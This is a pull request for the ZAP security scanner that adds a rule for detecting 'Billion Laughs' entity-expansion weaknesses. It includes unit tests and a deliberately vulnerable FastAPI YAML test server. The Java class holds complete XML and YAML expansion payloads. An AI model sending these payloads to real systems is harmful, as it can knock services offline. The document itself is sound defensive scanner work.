### PR TITLE
ascanrulesAlpha: Add Exponential Entity Expansion Scan Rule

### DIFF
--- a/addOns/ascanrulesAlpha/CHANGELOG.md
+++ b/addOns/ascanrulesAlpha/CHANGELOG.md
@@ -5,7 +5,8 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).
 
 ## Unreleased
 ### Added
-- Add Out-of-band XSS Scan Rule.
+- Out-of-band XSS Scan Rule.
+- Exponential Entity Expansion (Billion Laughs Attack) Scan Rule.
 
 ## [35] - 2022-01-07
 ### Fixed

--- a/addOns/ascanrulesAlpha/src/main/java/org/zaproxy/zap/extension/ascanrulesAlpha/ExponentialEntityExpansionScanRule.java
+++ b/addOns/ascanrulesAlpha/src/main/java/org/zaproxy/zap/extension/ascanrulesAlpha/ExponentialEntityExpansionScanRule.java
@@ -1,0 +1,162 @@
+/*
+ * Zed Attack Proxy (ZAP) and its related class files.
+ *
+ * ZAP is an HTTP/HTTPS proxy for assessing web application security.
+ *
+ * Copyright 2022 The ZAP Development Team
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *     http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package org.zaproxy.zap.extension.ascanrulesAlpha;
+
+import java.io.IOException;
+import java.net.SocketTimeoutException;
+import java.util.Collections;
+import java.util.List;
+import java.util.Map;
+import java.util.concurrent.TimeUnit;
+import org.apache.logging.log4j.LogManager;
+import org.apache.logging.log4j.Logger;
+import org.parosproxy.paros.Constant;
+import org.parosproxy.paros.core.scanner.AbstractAppPlugin;
+import org.parosproxy.paros.core.scanner.Alert;
+import org.parosproxy.paros.core.scanner.Category;
+import org.parosproxy.paros.network.HttpMessage;
+import org.zaproxy.addon.commonlib.CommonAlertTag;
+
+public class ExponentialEntityExpansionScanRule extends AbstractAppPlugin {
+
+    private static final Logger LOGGER =
+            LogManager.getLogger(ExponentialEntityExpansionScanRule.class);
+    private static final String PREFIX = "ascanalpha.entityExpansion.";
+    private static final long MIN_TIME_ELAPSED_MILLIS = TimeUnit.SECONDS.toMillis(10);
+    static final String XML_PAYLOAD =
+            "<?xml version=\"1.0\"?>\n"
+                    + "<!DOCTYPE lolz [\n"
+                    + " <!ENTITY lol \"lol\">\n"
+                    + " <!ELEMENT lolz (#PCDATA)>\n"
+                    + " <!ENTITY lol1 \"&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;\">\n"
+                    + " <!ENTITY lol2 \"&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;\">\n"
+                    + " <!ENTITY lol3 \"&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;\">\n"
+                    + " <!ENTITY lol4 \"&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;\">\n"
+                    + " <!ENTITY lol5 \"&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;\">\n"
+                    + " <!ENTITY lol6 \"&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;\">\n"
+                    + " <!ENTITY lol7 \"&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;\">\n"
+                    + " <!ENTITY lol8 \"&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;\">\n"
+                    + " <!ENTITY lol9 \"&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;\">\n"
+                    + "]>\n"
+                    + "<lolz>&lol9;</lolz>";
+    static final String YAML_PAYLOAD =
+            "a: &a [\"lol\",\"lol\",\"lol\",\"lol\",\"lol\",\"lol\",\"lol\",\"lol\",\"lol\"]\n"
+                    + "b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]\n"
+                    + "c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]\n"
+                    + "d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]\n"
+                    + "e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]\n"
+                    + "f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]\n"
+                    + "g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]\n"
+                    + "h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]\n"
+                    + "i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]";
+
+    @Override
+    public int getId() {
+        return 40044;
+    }
+
+    @Override
+    public String getName() {
+        return Constant.messages.getString(PREFIX + "name");
+    }
+
+    @Override
+    public String getDescription() {
+        return Constant.messages.getString(PREFIX + "desc");
+    }
+
+    @Override
+    public int getCategory() {
+        return Category.MISC;
+    }
+
+    @Override
+    public String getSolution() {
+        return Constant.messages.getString(PREFIX + "soln");
+    }
+
+    @Override
+    public String getReference() {
+        return Constant.messages.getString(PREFIX + "refs");
+    }
+
+    @Override
+    public int getRisk() {
+        return Alert.RISK_MEDIUM;
+    }
+
+    @Override
+    public Map<String, String> getAlertTags() {
+        return CommonAlertTag.toMap(
+                CommonAlertTag.OWASP_2021_A04_INSECURE_DESIGN,
+                CommonAlertTag.WSTG_V42_BUSL_09_UPLOAD_MALICIOUS_FILES);
+    }
+
+    @Override
+    public int getCweId() {
+        return 776;
+    }
+
+    @Override
+    public int getWascId() {
+        return 44;
+    }
+
+    @Override
+    public List<Alert> getExampleAlerts() {
+        return Collections.singletonList(newAlert().setConfidence(Alert.CONFIDENCE_LOW).build());
+    }
+
+    @Override
+    public void scan() {
+        String attack;
+        if (getBaseMsg().getRequestHeader().hasContentType("xml")) {
+            attack = XML_PAYLOAD;
+        } else if (getBaseMsg().getRequestHeader().hasContentType("yml", "yaml")) {
+            attack = YAML_PAYLOAD;
+        } else {
+            return;
+        }
+        HttpMessage msg = getNewMsg();
+        msg.setRequestBody(attack);
+        boolean socketTimeout = false;
+        try {
+            sendAndReceive(msg);
+        } catch (SocketTimeoutException e) {
+            socketTimeout = true;
+            LOGGER.debug("The exponential entity expansion query timed out.");
+        } catch (IOException e) {
+            LOGGER.warn(e.getMessage(), e);
+            return;
+        }
+        if (socketTimeout || msg.getTimeElapsedMillis() > MIN_TIME_ELAPSED_MILLIS) {
+            newAlert()
+                    .setAttack(attack)
+                    .setConfidence(Alert.CONFIDENCE_LOW)
+                    .setMessage(msg)
+                    .setOtherInfo(
+                            Constant.messages.getString(
+                                    PREFIX + "other",
+                                    TimeUnit.SECONDS.convert(
+                                            msg.getTimeElapsedMillis(), TimeUnit.MILLISECONDS)))
+                    .raise();
+        }
+    }
+}

--- a/addOns/ascanrulesAlpha/src/main/javahelp/org/zaproxy/zap/extension/ascanrulesAlpha/resources/help/contents/ascanalpha.html
+++ b/addOns/ascanrulesAlpha/src/main/javahelp/org/zaproxy/zap/extension/ascanrulesAlpha/resources/help/contents/ascanalpha.html
@@ -63,5 +63,10 @@ This rule attempts to discover Out-of-band XSS vulnerabilities.
 
 Latest code: <a href="https://github.com/zaproxy/zap-extensions/blob/main/addOns/ascanrulesAlpha/src/main/java/org/zaproxy/zap/extension/ascanrulesAlpha/OutOfBandXssScanRule.java">OutOfBandXssScanRule.java</a>
 
+<H2>Exponential Entity Expansion (Billion Laughs Attack)</H2>
+This rule attempts to identify the "Billion Laughs" vulnerability in servers that accept XML or YAML files.
+
+Latest code: <a href="https://github.com/zaproxy/zap-extensions/blob/main/addOns/ascanrulesAlpha/src/main/java/org/zaproxy/zap/extension/ascanrulesAlpha/ExponentialEntityExpansionScanRule.java">ExponentialEntityExpansionScanRule.java</a>
+
 </BODY>
 </HTML>

--- a/addOns/ascanrulesAlpha/src/main/resources/org/zaproxy/zap/extension/ascanrulesAlpha/resources/Messages.properties
+++ b/addOns/ascanrulesAlpha/src/main/resources/org/zaproxy/zap/extension/ascanrulesAlpha/resources/Messages.properties
@@ -65,3 +65,9 @@ ascanalpha.log4shell.cve45046.refs=https://www.cve.org/CVERecord?id=CVE-2021-450
 
 ascanalpha.oobxss.name=Out of Band XSS
 ascanalpha.oobxss.skipped=no Active Scan OAST service is selected.
+
+ascanalpha.entityExpansion.name=Exponential Entity Expansion (Billion Laughs Attack)
+ascanalpha.entityExpansion.desc=An exponential entity expansion, or "billion laughs" attack is a type of denial-of-service (DoS) attack. It is aimed at parsers of markup languages like XML or YAML that allow macro expansions.
+ascanalpha.entityExpansion.soln=Defenses against this kind of attack include capping the memory allocated in an individual parser if loss of the document is acceptable, or treating entities symbolically and expanding them lazily only when (and to the extent) their content is to be used.
+ascanalpha.entityExpansion.refs=https://en.wikipedia.org/wiki/Billion_laughs_attack\nhttp://projects.webappsec.org/XML-Entity-Expansion\nhttp://cwe.mitre.org/data/definitions/776.html
+ascanalpha.entityExpansion.other=The attack HTTP request received a response after {0} seconds.

--- a/addOns/ascanrulesAlpha/src/test/java/org/zaproxy/zap/extension/ascanrulesAlpha/ExponentialEntityExpansionScanRuleUnitTest.java
+++ b/addOns/ascanrulesAlpha/src/test/java/org/zaproxy/zap/extension/ascanrulesAlpha/ExponentialEntityExpansionScanRuleUnitTest.java
@@ -1,0 +1,131 @@
+/*
+ * Zed Attack Proxy (ZAP) and its related class files.
+ *
+ * ZAP is an HTTP/HTTPS proxy for assessing web application security.
+ *
+ * Copyright 2022 The ZAP Development Team
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *     http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package org.zaproxy.zap.extension.ascanrulesAlpha;
+
+import static fi.iki.elonen.NanoHTTPD.newFixedLengthResponse;
+import static org.hamcrest.MatcherAssert.assertThat;
+import static org.hamcrest.Matchers.is;
+
+import fi.iki.elonen.NanoHTTPD;
+import org.junit.jupiter.api.Test;
+import org.junit.jupiter.params.ParameterizedTest;
+import org.junit.jupiter.params.provider.ValueSource;
+import org.parosproxy.paros.network.HttpHeader;
+import org.parosproxy.paros.network.HttpMessage;
+import org.zaproxy.zap.testutils.NanoServerHandler;
+
+class ExponentialEntityExpansionScanRuleUnitTest
+        extends ActiveScannerTest<ExponentialEntityExpansionScanRule> {
+
+    private static final String GENERIC_RESPONSE =
+            "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n"
+                    + "<html><head></head><body></body></html>";
+
+    @Override
+    protected ExponentialEntityExpansionScanRule createScanner() {
+        return new ExponentialEntityExpansionScanRule();
+    }
+
+    @ParameterizedTest
+    @ValueSource(
+            strings = {"application/xml", "text/xml", "image/svg+xml", "application/xhtml+xml"})
+    void shouldSendXmlPayloadToXmlAcceptingEndpoints(String contentType) throws Exception {
+        // Given
+        String path = "/endpoint/";
+        nano.addHandler(new OkResponse(path));
+        HttpMessage msg = this.getHttpMessage(path);
+        msg.getRequestHeader().setHeader(HttpHeader.CONTENT_TYPE, contentType);
+        rule.init(msg, this.parent);
+        // When
+        rule.scan();
+        // Then
+        assertThat(countMessagesSent, is(1));
+        assertThat(
+                httpMessagesSent.get(0).getRequestBody().toString(),
+                is(ExponentialEntityExpansionScanRule.XML_PAYLOAD));
+    }
+
+    @ParameterizedTest
+    @ValueSource(
+            strings = {
+                "text/vnd.yaml",
+                "text/yml",
+                "text/yaml",
+                "text/x-yaml",
+                "application/x-yaml",
+                "application/x-yml"
+            })
+    void shouldSendYamlPayloadToYamlAcceptingEndpoints(String contentType) throws Exception {
+        // Given
+        String path = "/endpoint/";
+        nano.addHandler(new OkResponse(path));
+        HttpMessage msg = this.getHttpMessage(path);
+        msg.getRequestHeader().setHeader(HttpHeader.CONTENT_TYPE, contentType);
+        rule.init(msg, this.parent);
+        // When
+        rule.scan();
+        // Then
+        assertThat(countMessagesSent, is(1));
+        assertThat(
+                httpMessagesSent.get(0).getRequestBody().toString(),
+                is(ExponentialEntityExpansionScanRule.YAML_PAYLOAD));
+    }
+
+    @ParameterizedTest
+    @ValueSource(strings = {"text/plain", "application/json", "text/html"})
+    void shouldNotAttackNonXmlOrYamlAcceptingEndpoints(String contentType) throws Exception {
+        // Given
+        String path = "/endpoint/";
+        nano.addHandler(new OkResponse(path));
+        HttpMessage msg = this.getHttpMessage(path);
+        msg.getRequestHeader().setHeader(HttpHeader.CONTENT_TYPE, contentType);
+        rule.init(msg, this.parent);
+        // When
+        rule.scan();
+        // Then
+        assertThat(countMessagesSent, is(0));
+    }
+
+    @Test
+    void shouldNotAttackEndpointsWithoutContentTypeHeader() throws Exception {
+        // Given
+        String path = "/endpoint/";
+        nano.addHandler(new OkResponse(path));
+        HttpMessage msg = this.getHttpMessage(path);
+        rule.init(msg, this.parent);
+        // When
+        rule.scan();
+        // Then
+        assertThat(countMessagesSent, is(0));
+    }
+
+    private static class OkResponse extends NanoServerHandler {
+        public OkResponse(String path) {
+            super(path);
+        }
+
+        @Override
+        protected NanoHTTPD.Response serve(NanoHTTPD.IHTTPSession session) {
+            consumeBody(session);
+            return newFixedLengthResponse(
+                    NanoHTTPD.Response.Status.OK, "text/html", GENERIC_RESPONSE);
+        }
+    }
+}


### PR DESCRIPTION
Closes https://github.com/zaproxy/zaproxy/issues/6671.

The attack payloads were taken from https://en.wikipedia.org/wiki/Billion_laughs_attack.

<details><summary> Testing Code (Vulnerable Python FastAPI Server) </summary>

```python
import yaml
from fastapi import FastAPI
from fastapi.requests import Request
from fastapi.responses import JSONResponse

app = FastAPI()


@app.post(
    "/yaml-to-json/",
    openapi_extra={"requestBody": {"content": {"application/yaml": {"schema": {}}}}},
)
async def parse_yaml(request: Request):
    return JSONResponse(content=yaml.safe_load(await request.body()))

```
</details>

<details><summary>Screenshot</summary>

![image](https://user-images.githubusercontent.com/16446369/149611612-5db0b387-c440-4f2b-a51b-3301878f23b0.png)
</details>

Signed-off-by: ricekot <github@ricekot.com>